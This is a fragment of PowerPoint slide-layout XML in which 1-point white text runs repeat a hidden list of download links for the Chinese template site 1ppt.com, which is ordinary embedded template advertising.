              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout283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83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83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83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8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84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84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84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84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84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84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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout284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84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84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84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8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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout285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85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85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85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85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85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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
